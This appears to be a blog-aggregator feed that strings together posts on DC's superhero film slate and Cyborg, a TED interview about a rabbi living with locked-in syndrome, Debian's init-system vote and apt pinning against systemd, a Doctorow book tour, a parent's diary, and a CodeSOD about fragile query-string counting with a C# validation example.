But besides the far-flung timetable involved, it very much remains to be seen whether the company is willing to put in the work to elevate its non-white heroes to a position befitting their upcoming roles on the big screen.

Here’s how the schedule looks, courtesy of Slate:

Not only does this signal the long-awaited arrival of Wonder Woman in her own solo feature, but the Flash movie will be led by a queer actor in Ezra Miller. And that’s before getting to the two POC leads in Jason Momoa’s Aquaman and, perhaps more surprisingly, Ray Fisher starring as Cyborg.

Ray Fisher (right) will play Cyborg for DC Entertainment. image via wn.com

If you’ve never heard of Fisher, don’t be surprised; according to IMDB, his appearance in Batman v. Superman: Dawn of Justice will constitute his first major on-screen role. No pressure, right?

But look at the timeline again. Throw in Dwayne “The Rock” Johnson appearing in Shazam, and it’s likely that POC will not be prominent in a DCE film for at least three years. The X-factor here is Suicide Squad, which appears to be on the fast track and should by all rights include Amanda Waller. Even if it means the “sexy” version unveiled three years ago as part of the company’s comics relaunch.

A cynical observer might point out that waiting until 2018 for an Aquaman film starring Momoa and Fisher’s starring role two years(!) later gives DC enough time to scuttle their plans if Dawn of Justice is as much of a disappointment as Man of Steel. Or that Aquaman and Cyborg’s position in the movie pipeline reflects their standing within the Justice League. They’re such valued members that the Suicide Squad got the nod first, and Cyborg has to wait for two Justice League movies before getting his shot. A cynic might argue that the only reason Cyborg isn’t dead last is because Ryan Reynolds’ turn as Hal Jordan was enough of a flop that the Green Lantern movie brand still hasn’t recovered.

Cyborg in the “Super Powers Team: Galactic Guardians” cartoon. Image via DC Wikia.

On the bright side, DC now has no excuse to decisively elevate Cyborg into the top tier of its roster, even if most sensible fans wish John Stewart were getting that same treatment. It’s important to remember, first of all, that Victor Stone’s inclusion in the Justice League’s “New 52” comics roster isn’t without precedent; in 1985, the character was featured on the Super Powers Team: Galactic Guardians animated series, the final incarnation of the venerable SuperFriends franchise.

Cyborg on the cover of “Tales of the New Teen Titans” #1, as published in June 1982. Image via Wikipedia.

Then, as now, Cyborg was the junior member of the team — the POV character for the audience and the team’s designated IT person. Which probably seemed fine to casual viewers, but was in fact a reduction of his much larger role in DC’s hottest property of that time, the Teen Titans comic. As conceived by Marv Wolfman and George Perez, the Victor Stone of the ’80s had the benefit of a full journey from being horrified at his condition to eventually leading the team and forging a new family relationship with them.

But just as John Stewart went from a stalwart hero to one with a higher profile thanks to the Justice League and Justice League Unlimited series, another version of the Titans brand put Cyborg in the public eye:


Cyborg in the “Teen Titans Go!” animated series. Image via Fanpop.com.

It’s very possible that, to non-comics fans, their image of Cyborg is of the high-appetite, high-energy version from Teen Titans Go!. A funny guy, sure, but maybe not the kind of hero that’s going to fill up a multiplex. If DC is serious about making the character the next great POC movie superhero, we’d like to argue that the company needs to split the difference: show his traumatic origin, sure, but take him beyond the JLA’s sidekick and let his film reach for the afrofuturistic heights he’s perfectly positioned to reach. A movie-going public living in an increasingly tech-reliant world could really get behind a hero who can plumb the depths of the grid from anywhere in the physical world. If DC wants to end its “phase one” with a bang, it needs to stop treating Cyborg like the last one in line, and understand that for this position in pop culture, he’s the first of his kind.


TED: What’s it like to live with locked-in syndrome? One family’s experience

TED Fellow Kitra Cahana shares the story of her father at TEDMED. Photo: Courtesy of TEDMED

Kitra Cahana shares the extraordinary story of her father’s brain stem stroke, a catastrophe that transformed into an inspiring spiritual journey. Photo: TEDMED

Three years ago, Rabbi Ronnie Cahana suffered a rare brain stem stroke that left him fully conscious, yet his entire body paralyzed. It’s a condition known as “locked-in syndrome.”

Last month, TED Fellow Kitra Cahana spoke of her father’s experience at TEDMED (watch her talk, “My father, locked in his body but soaring free”), revealing how her family cocooned Rabbi Cahana in love, and how a system of blinking, in response to the alphabet, patiently allowed him to dictate poems, sermons and letters to his loved ones and to his congregation.

Kitra began documenting her father’s recovery in photographs and video, creating layered images that — in contrast to her photojournalistic work — are more abstract and emotional. “I wanted to try to find a way to take photographs that reflected the mystical things that were happening in the hospital room,” she says. “How do I explain, in a photograph, the power that another human being has to either add or detract from the healing of another person? I started a process of trying to tell a story in images.”

As Rabbi Cahana began to regain his ability to speak, Kitra started recording his voice. She is now in the process of developing this body of work for an exhibition to help raise support for his ongoing care and rehabilitation.

Below, see Kitra’s stunning images — accompanied by her father’s poems — and hear more about the thoughts behind them. But first, a Q&A with Rabbi Cahana himself, in which he describes his own experience.

Rabbi Cahana writes, “You have to believe you’re paralyzed to play the part of a quadriplegic. I don’t. In my mind and in my dreams, every night I Chagall-man float over the city, twirl and swirl, with my toes kissing the floor. I know nothing about this statement of man without motion. Everything has motion. The heart pumps, the body heaves, the mouth moves, the eyes turn inside-out. We never stagnate. Life triumphs up and down.” Image: Kitra Cahana

Rabbi Cahana answers our questions on being locked in

Can you tell us what happened, from your point of view?

In July of 2011, upon returning from a weeklong visit to my mother and sister’s home in Houston, I had a stroke that shut down my body into a complete paralysis besides my mind and my uneasy use of my weakened, blurred eyes. Locked-in syndrome, they called it. “The air weighs a hundred pounds,” I wanted to say to anyone who was interested.

I was not in discomfort. I felt the sensation of touch on me, and surrounding me. I was sure that I had a helmet over my head to safeguard me. My neck itself seemed to weigh fifty pounds. A mysterious tortoise-shell immediately clasped me and kept me safe whenever needed. With my torso secure, my limbs felt doubled — the wooden petrified ones tethered by leather straps to ones jumping and slapping around. It was my duty to bring these fiery, spirited, animated parts to merge with my outer deadwood. I worked incessantly through sleepless nights and tyrannical days to fuse the miniature into the large. I kept hearing sirens from outside the hospital interrupting this task. It took about a year until each member became whole again, until they became one.

It took me three and a half months to get off the artificial breathing machine. That was my first miraculous victory. The next task was to get my epiglottis active. They wanted to give me thickened food — puréed this-and-that — whereas I wanted raw vegetables and fruit. I was denied the right to drink water for months over months. Water is the source of life, that which I craved most as an elixir. I dreamt of it. I tasted it. I could sense the coldness and the raw beauty of thirst — parched parts quenched. These days I eat whatever I want, whatever I am blessed with. I have a good physio who stands me upright, and a speech therapist to bring out the voice.

How would you describe your mental and emotional state during the time of being locked in?

The stroke transcended me. I don’t know much about it except that I was replanted into the ground and found my discombobulated bodyparts spread across the landscape. My holy work of these last three years has been to re-unify from a central whirlwind of light — dizzying, upside-down, topsy-turvy. I want to grow this plant of mine out of the underground. I imagine this is what every seed sees before it proceeds.

Doctors live by science and statistics. Rabbis live by inner spirit and G-dliness. Nobody has ever asked me what it’s like to have a paralyzed digit — fingers that lead a motionless existence. I, too, refrain from asking: “How does it feel to handle dried-up bones? Do you fear a life without movement?” But this is the under-exchange of everyone in touch with those who can’t touch back. My biggest loss is the gentle caress that I once could give.

Throughout this process, the air I breathe has been full with open prayers of love, with eyes upon me, soothing, cooing soft-spoken kindnesses. My family wiggles my flapping shoulder blades to revive them. My congregation visits me as if agreeing that nothing has happened; there is no loss, there is only us today and our future. We all ease each other’s lives. I am wondrously happy for the privilege of seeing life in this dimension. I capture miracles in instants. Challenge is privilege. It is a privilege to live this story.

The images Kitra takes of you feel very vulnerable and reflective. Did your father-daughter relationship change dramatically after the stroke?

I am in awe of Kitra’s art and her desire to unstiffen what is locked up. She finds communities of the locked-away; she researches for breakthroughs and latest up-to-date machinery and medical advances. She speaks the language of negating the impossible. She champions me through pitfalls and traps of institutional clumsiness. She sees me already walking through the streets; she chaperones me down the halls of my returning. It is wondrous to never be defeated. Transformation is celebratory.

I loved Kitra the same in the instant of her birth. She created me as a father that day. I’ve only begun to emerge as she nurses me and nurtures me up to a sense of knowing what it means to be alive. My love for her and all my children has deepened in the emergency status. There is only intimate language in the presence of a precious person of your own issue. The privilege of parenthood is even more daunting than the responsibility. I am overwhelmed with the gratitude of being remade in my children’s image now that they are adults. I tell them I see G-d’s face when they present their loving glow. They are the Sabbath candles themselves.

You wrote texts to go with each of Kitra’s images. To whom are they addressed? They seem to be meditations on consciousness rather than communication. After your illness, was all your communication in this form?

After coming to consciousness, the mind narrowed to simple whispers. I was bare-faced and raw matter. The blessing ‘to bless’ in Hebrew is “Yisai Adonai Panav Elecha,” or “May G-d lift your countenance.” “Ya’er Panav Elecha v’Chuneka.” “May G-d’s light illuminate your face and bring forth your grace.” Or as King David said, “From G-d’s divine light we see light.” At the moment of arising from the stroke, I felt G-d lift my face and pierce into an inner glow. I spoke to that light and from it all at once. I understood that everyone gets this brilliant radiance early in life, and I know that it’s a mere temporary flash to return to again and again. This is enlightened consciousness. It’s a flash that I ever try to retrieve.

All my writings are love songs to G-d. I only have thanks. G-d has given me a future again. And this is a glimpse (the marvel) of eternity’s touch.

Your texts refer to a passionate love. Is this about the love between husband and wife, or love for the divine?

Both. G-d’s challenge to each human being is to reach the fullest extent of your capacity to love and ever grow it, ever test it, ever push it. That’s why we are created and how we continue creating ourselves. The passionate love of me to my wife, my wife to me, is an embodiment of the challenging love that the Almighty presents before us. How much of the heavenly abode do we bring into our love? Loving [my wife] Karen, she loving me, brings us to seek the Almighty’s presence. When I pray to G-d I ask to find Karen. When I’m near Karen, I ask her to help me discover the Creator of Life. This is love language. It doesn’t matter what state of disrepair the body is in. This is the heart’s fullest reach. Nothing has changed in our love for each other. I am alive because I live for Karen’s eyes upon me once again.

Rabbi Cahana writes, “What is beautiful? We can close our eyelids, but it’s hard to close our ears. All directions can come to the ear. We can’t really turn our heads, like in seeing, to a particular angle. Hearing is how G-d responds to prayer. That’s sincere.” Photo: Kitra Cahana

Rabbi Cahana writes, “Oh my wife. I belong to you. I see the skin fold hurry under your eyelids. I want to be your sleep. I walk along your long grace. Your bones are hard to everyone’s stance, but not to my fingers’ touch. There are tender demands when you open your lips, your tongue, your teeth. Your teeth are teaching my empty throat. Am I only just now breathing? G-d has given me this. We are face, two legs, alike. We have no weight. Wherever we are, the world is turning. This is nonesuch time.” Image: Kitra Cahana

Rabbi Cahana writes, “There’s a new kind of slumber with a stroke. You get dizzy, lucid. There is a mini explosion and there is no up. There is no forward. It’s just twisting like a space-man’s walk, tethered to the intangible. It’s amazing. I was lifted into a hoist. I said to myself: Remember you’re in the air for real now. Hover over this bed, and be there more than you are under it.” Video: Kitra Cahana

Rabbi Cahana writes, “My dream state is closer to G-d than any open-eyed watch of how foreshortened my wingspan might be. I feel awake and alive and follow through with what my body can’t seem to do. It’s not pretending when I say I believe this is only temporary. It is my open-aired will that makes these three years seem like only a blink. And still I see the world stumble by and I criticize its footwork. I still believe I walk more gracefully. After all, who among us is really sure-footed?” Image: Kitra Cahana

Rabbi Cahana writes, “I singsong my body as its own cradle. Back and up head and down. There is a floating whir on my skin. Only a year and a half later will it dissipate. Its the skinny skin that crinkles. My eyes stay closed. All of life now will forever be whispers. But G-d’s ear is here.” Image: Kitra Cahana

Kitra Cahana answers our questions about these images

What has your father’s experience been like for you?

It has been a shift in my trajectory. My father’s experience of the stroke was one of endless spirituality and curiosity and this mystical understanding of how to heal. He’s a rabbi, a spiritual leader and poet and as such often spoke in this kind of otherly language about reality and his experience — a very surreal, poetic language. His language has a cadence of its own. Sometimes it can be difficult to understand, but it speaks to me on a deep level. Somehow it’s very accessible to me.

We were raised on mystical ideas about G-d. ‘Does G-d exist?’ was never a relevant or pertinent question to my spirituality. The root question to ask is: How do people experience existence? Do you have an experience of a G-d or a G-dlike concept? is more telling to me, than declaring one’s belief in an unknown. I’ve approached a lot of what my father has said regarding his stroke in the same manner. I don’t question what he says, as in: ‘Did that really happen?’ He had many visions when the stroke first struck him. In one, he had an encounter, standing before G-d, wherein the totality of his own life, his own soul, accused him for all his wrong-doings and shortcomings. His own father’s soul came to his defense, and pleaded for my father to get more life. I don’t question whether that is real or not. I listen to him openly, trying to just understand what his experience of reality looks like.

How do you do that? How does he communicate?

Right after the stroke, we communicated through a blinking methodology where the transcriber recites the alphabet and he would blink at each letter. People started flocking to our ICU room, and then our hospital room, and he would hold these long conversations with them. Congregants, nurses and orderlies would come to his bedside at their break time and, through us, my father would counsel them. It was all in this very, very slow time — this sort of otherly orbit that was created in midst of the hustling, bustling hospital.

Initially, communication was extremely disorienting. Until we got into a good rhythm and flow — and established how to initiate vowels, and other shortcuts — there were so many miscommunications. We would recite the alphabet, A, B, C, D, and he would wait to blink at the correct letter. Afterwards he told us that anticipating each letter was excruciating. He would keep his eyes wide open, in fear that he would blink at the wrong letter and our whole communication would get thrown off. There were so many moments to misread what he wanted to say. Even when he started mouthing, and then speaking intermittently, it continued — and continues — to be difficult. Initially we tried different methods. We tried to do the alphabet of most commonly used letters, but there were a lot of confusions. There’s another smart system wherein the locked-in patient divides his or her gaze into different quadrants, and then divides each quadrant again to indicate a specific letter. We could have learned that language, but I think my father was in such a rush to express all the things running through his mind that the simple ABCD method was the easiest.

Can he feel his body right now?

He always had sensation. But he describes his first sensation as though he were floating through the ether. He has this strange description that each of his limbs were dead logs and tethered to each was this miniature limb that was just full of spirit — zinging all over the room. He said there was a rope attached to each of these smaller limbs, and that if the rope wasn’t there, these limbs would just fly across the world, to everywhere. I don’t necessarily understand his physical experience. He describes it as being rebirthed at 57 — that he was conscious, going through the birth canal. He says ‘I’m two years old now.’ To him that’s a complete privilege and blessing.

Initially, I started documenting him in the style that I know — traditional journalistic photographs. But those photographs were so literal. Those images spoke to the care and the love in our hospital room, but they weren’t able to access the deeper soul experience. My challenge was to find a visual language that would be in dialogue with our spiritual and emotional landscape.

Did changing your usual style feel good?

I’ve never felt like my documentary work reflected my inner essence. In a way, when I work on a story — documenting in a traditional documentary manner — I feel as though my role between my subject and the audience is one of a medium. There’s a subject who passes through my lens, my aesthetic filter, in order to reach an audience, a public. I can overlay an aesthetic voice to that, but I never felt like I was giving it my voice. Photographing my father — layering images, video and audio on top of each other — it’s the first time I’m expressing something deep inside of me in a photographic language. I’ve never felt that way about my work before. It’s the first seed. But it’s lovely growing into this new place with my father as a collaborator and subject.

What motivated you to speak at TEDMED?

It’s very difficult to express the sublime and the surreal in words and photographs. I wanted to attempt to communicate all that my family had experienced – my father’s brain stem stroke, and the profound spiritual awakening that followed – with others. This is what my father taught us; he said that all who came into his room of healing should expect to be healed themselves. Healing has to be mutual.

The stroke ruptured my reality as well as his. In those initial months, I saw sides of myself I never knew existed. I would have loved for him to have spoken at TEDMED himself but, as in the hospital — where my mother, sisters, brother and I acted as his mouthpiece — we continue to act in that capacity.

What impact do you hope the talk will have?

Part of my father’s message is that he hopes others will step outside of the space-time hustle and bustle that many of us are so used to. He experiences life in a kind of slow-time. He spent and continues to spend hours alone with himself.  That space of aloneness with his thoughts is not a place of anxiety, but a place of joy and introspection. I hope that others get a sense of this slow-space-time, where you exist only with yourself, with those other humans that you are intimate with, and – as my father would also say – with God.

Since my father’s stroke, I’ve become involved in a global community of people who have experienced brain stem strokes, either personally or on the part of a loved one. They are either still fully locked-in or have made progress, including some partial to full recoveries. So many of those who have experienced being locked-in were written off too early. Their families were told to expect very little. As a result, they did not receive proper rehabilitation therapies, nor were their bodies moved on a daily basis to maintain a minimum quality of comfort. I’ve seen health care professionals refuse to address the locked-in patient directly, speaking about him or her in the third person, insensitive to the fact that the person is still completely conscious and able to communicate. We struggle every day to sensitize health care professionals and institutions.

Healing is taxing. But what is even more taxing is trying to heal in systems and institutions that drain the already low reserves of patients. My father was able to have the spiritual experience that he had because he had a family and a congregation that preserved him in his role as father, husband and rabbi and advocated for him when he wasn’t able to.

You said before that he can feel his body now. To what extent?

He’s made huge progress — he breathes by himself, he predominantly has his own speaking voice to rely on now. It wanes, but he conducted a wedding last year, and he teaches in the synagogue. He has some motion capabilities. A lot of it’s about getting stronger; it’s really hard to rebuild an entire body all at once. I don’t know if or when he’s going to reach his limits, but that’s not an important question to me. To me, it’s about being part of his healing support network.

Rabbi Cahana writes, “When my brain exploded my body flew apart onto my backyard, only ten times larger. My mind landed on top of the hedges. One arm a mile away, another arm over here. Legs here, legs there. The torso somewhere else. It was my job to somehow bring these all back together. To bring the body back to the head. This was my spiritual duty.” Image: Kitra Cahana

Want to support Rabbi Cahana? Find out how.

And special thanks to TEDMED, for contributing to this piece.


TEDAndrew Bastawrous’ bakery for better eye care gets lift off, the Sleepy Man Banjo Boys make a video, and more

As always, members of the TED community have been very busy the past few weeks. Below, just a few of them making the news:

Earlier this month, Mazda promised to fund one of four projects dreamed up by TED Fellows — based on your votes. The winner: eye surgeon Andrew Bastawrous, for his Eye Bake program. With Mazda’s help, he’ll be building up the Ujima Bakery in Kenya, which will employ local people while raising money to subsidize eye care. (Watch Andrew’s TED Talk, “Get your next eye exam on a smartphone.”)

Susan Cain is writing a children’s book, to be released in May 2015. While Quiet focused on the workplace, this new book — called Quiet Power – will focus on school, extracurriculars and family life. It’ll also feature illustrations by Grant Snider. (Watch Susan’s talk, “The power of introverts.” And read our interview with her: “How to teach a young introvert.”)

Speaking of school, Clay Shirky has banned the use of technology in his classes. In an essay on Medium, he admits that this is a bold move for a technologist. (Watch Clay’s most recent TED Talk, “How the internet will (one day) transform government.”)

The Sleepy Man Banjo Boys have made their very first music video: “Same Same Stars.” Watch it below. (And check out their TED Talk, “Teen wonders play bluegrass.”)

Sculptor Janet Echelman has received the Smithsonian American Ingenuity Award in Visual Arts. She accepted the award at a gala award ceremony at the National Portrait Gallery in Washington, DC. (Watch Janet’s talk, “Taking imagination seriously.” And read about her sculpture at TED2014, “Skies Painted with Unnumbered Sparks.”)

Dave Eggers tells The San Francisco Chronicle that his publishing house, McSweeney’s, is applying to become a nonprofit. “It just seemed that increasingly many of the things that we wanted to do were nonprofit projects and not really things that you could reasonably expect to break even on,” he explains. (Watch Dave’s TED Prize Wish revealed in the talk, “Once upon a school.”)

Majora Carter has big plans for the shuttered juvenile detention center down the road from her childhood home in the Bronx, New York. Once a place known for its brutal conditions, she shares with Next City her plans to transform it into a space of opportunity in the community. (Watch Majora’s talk, “3 stories of local eco-entrepreneurship.”)


Planet DebianLucas Nussbaum: Tentative summary of the amendments of the init system coupling GR

This is an update of my previous attempt at summarizing this discussion. As I proposed one of the amendments, you should not blindly trust me, of course. :-)

First, let’s address two FAQ:

What is the impact on jessie?
On the technical level, none. The current state of jessie already matches what is expected by all proposals. It’s a different story on the social level.

Why are we voting now, then?
Ian Jackson, who submitted the original proposal, explained his motivation in this mail.

We now have four different proposals: (summaries are mine)

  • [iwj] Original proposal (Ian Jackson): Packages may not (in general) require one specific init system (Choice 1 on this page)
  • [lucas] Amendment A (Lucas Nussbaum): support for alternative init systems is desirable but not mandatory (Choice 2 on this page)
  • [dktrkranz] Amendment B (Luca Falavigna): Packages may require a specific init system (Choice 3 on this page)
  • [plessy] Amendment C (Charles Plessy): No GR, please; already resolved (Choice 4 on this page)

[plessy] is the simplest, and does not discuss the questions that the other proposals are answering, given it considers that they already have been resolved (even though I disagree with this analysis).

In order to understand the three other proposals, it’s useful to break them down into several questions.

Q1: support for the default init system on Linux
A1.1: packages MUST work with the default init system on Linux as PID 1.
(That is the case in both [iwj] and [lucas])

A1.2: packages SHOULD work with the default init system on Linux as PID 1.
With [dktrkranz], it would no longer be required to support the default init system, as maintainers could choose to require another init system than the default, if they consider this a prerequisite for its proper operation; and no patches or other derived works exist in order to support other init systems. That would not be a policy violation. (see this mail and its reply for details). Theoretically, it could also create fragmentation among Debian packages requiring different init systems: you would not be able to run pkgA and pkgB at the same time, because they would require different init systems.

Q2: support for alternative init systems as PID 1
A2.1: packages MUST work with one alternative init system (in [iwj])
(if you are confused with “one” here, it’s basically fine to read it as “sysvinit” instead. See this subthread for a discussion about this)
To the user, that brings the freedom to switch init systems (assuming that the package will not just support two init systems with specific interfaces, but rather a generic interface common to many init systems).
However, it might require the maintainer to do the required work to support additional init systems, possibly without upstream cooperation.
Lack of support is a policy violation (severity >= serious, RC).
Bugs about degraded operation on some init systems follow the normal bug severity rules.

A2.2: packages SHOULD work with alternative init systems as PID 1. (in [lucas])
This is a recommendation. Lack of support is not a policy violation (bug severity < serious, not RC).

A2.3: nothing is said about alternative init systems (in [dktrkranz]). Lack of support would likely be a wishlist bug.

Q3: special rule for sysvinit to ease wheezy->jessie upgrades
(this question is implicitly dealt with in [iwj], assuming that one of the supported init systems is sysvinit)

A3.1: continue support for sysvinit (in [lucas])
For the jessie release, all software available in Debian ‘wheezy’ that supports being run under sysvinit should continue to support sysvinit unless there is no technically feasible way to do so.

A3.2: no requirement to support sysvinit (in [dktrkranz])
Theoretically, this could require two-step upgrades: first reboot with systemd, then upgrade other packages

Q4: non-binding recommendation to maintainers
A4.1: recommend that maintainers accept patches that add or improve support for alternative init systems. (in both [iwj] and [lucas], with a different wording)

A4.2: say nothing (in [dktrkranz])

Q5: support for init systems which are the default on non-Linux ports
A5.1: non-binding recommendation to add/improve support with a high priority (in [lucas])

A5.2: say nothing (in [iwj] and [dktrkranz])

 

Comments are closed: please discuss by replying to that mail.

Planet DebianErich Schubert: Avoiding systemd isn't hard

Don't listen to trolls. They lie.
Debian was and continues to be about choice. Previously, you could configure Debian to use other init systems, and you can continue to do so in the future.
In fact, with wheezy, sysvinit was essential. In the words of trolls, Debian "forced" you to install SysV init!
With jessie, it will become easier to choose the init system, because neither init system is essential now. Instead, there is an essential meta-package "init", which requires you to install one of systemd-sysv | sysvinit-core | upstart. In other words, you have more choice than ever before.
Again: don't listen to trolls.
However, notice that there are some programs such as login managers (e.g. gdm3) which have an upstream dependency on systemd. gdm3 links against libsystemd0 and depends on libpam-systemd; and the latter depends on systemd-sysv | systemd-shim so it is in fact software such as GNOME that is pulling systemd onto your computer.
IMHO you should give systemd a try. There are some broken (SysV-) init scripts that cause problems with systemd; but many of these cases have now been fixed - not in systemd, but in the broken init script.
However, here is a clean way to prevent systemd from being installed when you upgrade to jessie. (No need to "fork" Debian for this, which just demonstrates how uninformed some trolls are ... - apart from Debian being very open to custom Debian distributions, which can easily be made without "forking".)
As you should know, apt allows version pinning. This is the proper way to prevent a package from being installed. All you need to do is create a file named e.g. /etc/apt/preferences.d/no-systemd with the contents:
Package: systemd-sysv
Pin: release o=Debian
Pin-Priority: -1
From the documentation, a priority less than 0 disallows the package from being installed. systemd-sysv is the package that would enable systemd as your default init (/sbin/init).
This change will make it much harder for aptitude to solve dependencies. A good way to help it to solve the dependencies is to install the systemd-shim package explicitly first:
aptitude install systemd-shim
After this, I could upgrade a Debian system from wheezy to jessie without being "forced" to use systemd...
In fact, I could also do an aptitude remove systemd systemd-shim. But that would have required the uninstallation of GNOME, gdm3 and network-manager - you may or may not be willing to do this. On a server, there shouldn't be any component actually depending on systemd at all. systemd is mostly a GNOME-desktop thing as of now.
As you can see, the trolls are totally blaming the wrong people, for the wrong reasons... and in fact, the trolls make up false claims (as a fact, systemd-shim was updated on Oct 14). Stop listening to trolls, please.
If you find a bug - a package that needlessly depends on systemd, or a good way to remove some dependency e.g. via dynamic linking, please contribute a patch upstream and file a bug. Solve problems at the package/bug level, instead of wasting time doing hate speeches.

Cory DoctorowI’m coming to Vancouver, Seattle, Portland, SF/Palo Alto!


As the tour with my graphic novel In Real Life draws to a close, my next tour, with my nonfiction book Information Doesn't Want to Be Free kicks off with stops down the west coast.

I've also got stops coming up in Warsaw, London, Stockholm, Ann Arbor, Baltimore, DC, and Denver -- here's the whole list. Here's some of what Kirkus Review had to say about the new book:

In his best-selling novel Ready Player One, Ernest Cline predicted that decades from now, Doctorow (Homeland, 2013, etc.) should share the presidency of the Internet with actor Wil Wheaton. Consider this manifesto to be Doctorow’s qualifications for the job.

The author provides a guide to the operation of the Internet that not only makes sense, but is also written for general readers. Using straightforward language and clear analogies, Doctorow breaks down the complex issues and tangled arguments surrounding technology, commerce, copyright, intellectual property, crowd funding, privacy and value—not to mention the tricky situation of becoming “Internet Famous.” Following a characteristically thoughtful introduction by novelist Neil Gaiman, rock star Amanda Palmer offers a blunt summary of today’s world: “We are a new generation of artists, makers, supporters, and consumers who believe that the old system through which we exchanged content and money is dead. Not dying: dead.” So the primary thesis of the book becomes a question of, where do we go from here? Identifying the Web’s constituents as creators, investors, intermediaries and audiences is just the first smart move. Doctorow also files his forthright, tactically savvy arguments under three “laws,” the most important of which has been well-broadcast: “Any time someone puts a lock on something that belongs to you and won’t give you the key, that lock isn’t there for your benefit.”

Planet Linux AustraliaAndrew Pollock: [life] Day 265: Kindergarten and startup stuff

Zoe yelled out for me at 5:15am for some reason, but went back to sleep after I resettled her, and we had a slow start to the day a bit after 7am. I've got a mild version of whatever cold she's currently got, so I'm not feeling quite as chipper as usual.

We biked to Kindergarten, which was a bit of a slog up Hawthorne Road, given the aforementioned cold, but we got there in the end.

I left the trailer at the Kindergarten and biked home again.

I finally managed to get some more work done on my real estate course, and after a little more obsessing over one unit, got it into the post. I've almost got another unit finished as well. I'll try to get it finished in the evenings or something, because I'm feeling very behind, and I'd like to get it into the mail too. I'm due to get the second half of my course material, and I still have one more unit to do after this one I've almost finished.

I biked back to Kindergarten to pick up Zoe. She wanted to watch Megan's tennis class, but I needed to grab some stuff for dinner, so it took a bit of coaxing to get her to leave. I think she may have been a bit tired from her cold as well.

We biked home, and jumped in the car. I'd heard from Matthew's Dad that FoodWorks in Morningside had a good meat selection, so I wanted to check it out.

They had some good roasting meat, but that was about it. I gave up trying to mince my own pork and bought some pork mince instead.

We had a really nice dinner together, and I tried to get her to bed a little bit early. Every time I try to start the bed time routine early, the spare time manages to disappear anyway.

Worse Than FailureCodeSOD: Is It Safer to Use Numbers?

Mac didn't know anything about how the JavaScript on the search page worked, and he wasn't that great at CSS styling, but that didn't matter. He had his orders. As part of the latest round of enhancements, the front-end developer had added another search parameter which would be passed via the regular search URL, and the back end needed to be adjusted to accommodate. (You know... instead of 'http://initrode.com/search?a=xxx&b=yyy' it now was 'http://initrode.com/search?a=xxx&b=yyy&c=zzz'.)

No problem. Mac made his tweak in the code and ran a quick test...which failed instantly in a spectacular way. "WTF? It's a parameter. Must be already used..." he thought, but nope.

Digging deeper, Mac came upon the following:

public enum eQueryParametersCount
{
  New = 2,
  Filtering = 3,
  Navigation = 6,
  SwitchView = 7
}

Odd. And then peppered throughout...

int iCount = Request.QueryString.Count;
if (iCount != (int)eQueryParametersCount.New
      && iCount != (int)eQueryParametersCount.Navigation
      && iCount != (int)eQueryParametersCount.Filtering
      && iCount != (int)eQueryParametersCount.SwitchView
   )
{
  logger.Log("QueryString error: invalid querystring");
  Response.Redirect(PageManager.ErrorPage);
}

...and...

else if ((Request.QueryString.Count == (int)eQueryParametersCount.Filtering) && (!SetConfirmationMessage()))
     {
       if (!GetOverallQuality())
       {
         logger.Log("QueryString error: r not found or invalid value");
         Response.Redirect(PageManager.ErrorPage);
       }
     }

In short, the previous coders figured that it was much better to 'count' the number of parameters to determine what the user wanted instead of actually reading them. It also means you can never have 3 params because that is taken by a different enum.

As Mac set about tearing things apart he found himself considering how tough it would really be to pick up some web design skills.
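For contrast with the count-based checks above, here is an added example (not code from the article or from the application it describes) that decides the search mode from parameter names and validates each value against an allow-list, so adding the optional `c` parameter breaks nothing. The names `page` and `view`, the value ranges, and all class names are assumptions made for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Globalization;
using System.Linq;
using System.Web; // HttpUtility.ParseQueryString

public enum SearchMode { New, Filtering, Navigation, SwitchView }

public sealed class SearchRequest
{
    public SearchMode Mode { get; set; }
    public int? Quality { get; set; }  // from "r"
    public int? Page { get; set; }     // from "page" (assumed name)
    public string View { get; set; }   // from "view" (assumed name)
}

public static class SearchRequestParser
{
    // "a", "b", "c" and "r" appear in the article; "page" and "view" are assumed names.
    private static readonly string[] Required = { "a", "b" };
    private static readonly string[] Selectors = { "r", "page", "view" };
    private static readonly HashSet<string> Known =
        new HashSet<string>(StringComparer.Ordinal) { "a", "b", "c", "r", "page", "view" };
    private static readonly HashSet<string> Views =
        new HashSet<string>(StringComparer.Ordinal) { "list", "grid" }; // assumed values

    // Returns the parsed request, or null plus a fixed error string that never
    // echoes attacker-controlled text into the log.
    public static SearchRequest Parse(NameValueCollection query, out string error)
    {
        error = Check(query, out SearchRequest request);
        return error == null ? request : null;
    }

    private static string Check(NameValueCollection query, out SearchRequest request)
    {
        request = new SearchRequest { Mode = SearchMode.New };

        foreach (string key in query.AllKeys)
        {
            // A null key is how the parser reports a token that has no "name=" part.
            if (key == null || !Known.Contains(key)) return "unknown parameter";
            if (query.GetValues(key).Length != 1) return "repeated parameter";
        }
        foreach (string key in Required)
        {
            if (string.IsNullOrEmpty(query[key])) return "missing required parameter";
        }
        // The mode comes from WHICH selector is present, never from how many keys there are.
        if (Selectors.Count(k => query[k] != null) > 1) return "conflicting mode parameters";

        if (query["r"] != null)
        {
            if (!TryRange(query["r"], 1, 5, out int quality)) return "r not found or invalid value";
            request.Mode = SearchMode.Filtering;
            request.Quality = quality;
        }
        else if (query["page"] != null)
        {
            if (!TryRange(query["page"], 1, 1000, out int page)) return "invalid page";
            request.Mode = SearchMode.Navigation;
            request.Page = page;
        }
        else if (query["view"] != null)
        {
            if (!Views.Contains(query["view"])) return "invalid view";
            request.Mode = SearchMode.SwitchView;
            request.View = query["view"];
        }
        return null;
    }

    // Digits only (no sign, whitespace or thousands separators), then a range check.
    private static bool TryRange(string text, int min, int max, out int value)
    {
        return int.TryParse(text, NumberStyles.None, CultureInfo.InvariantCulture, out value)
            && value >= min && value <= max;
    }
}

public static class Demo
{
    public static void Main()
    {
        // Constructed sample query strings; the last three must be rejected.
        string[] samples =
        {
            "a=xxx&b=yyy",
            "a=xxx&b=yyy&c=zzz",
            "a=xxx&b=yyy&c=zzz&r=4",
            "a=xxx&b=yyy&r=9",
            "a=xxx&b=yyy&debug=1",
            "a=xxx&b=yyy&r=4&page=2"
        };
        foreach (string sample in samples)
        {
            SearchRequest request =
                SearchRequestParser.Parse(HttpUtility.ParseQueryString(sample), out string error);
            Console.WriteLine("{0,-26} -> {1}", sample,
                request != null ? request.Mode.ToString() : "rejected: " + error);
        }
    }
}
```

In the page handler, `Request.QueryString` can be passed straight to `SearchRequestParser.Parse`, since it is already a `NameValueCollection`.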

 

Photo credit: Laineys Repertoire / Foter / CC BY

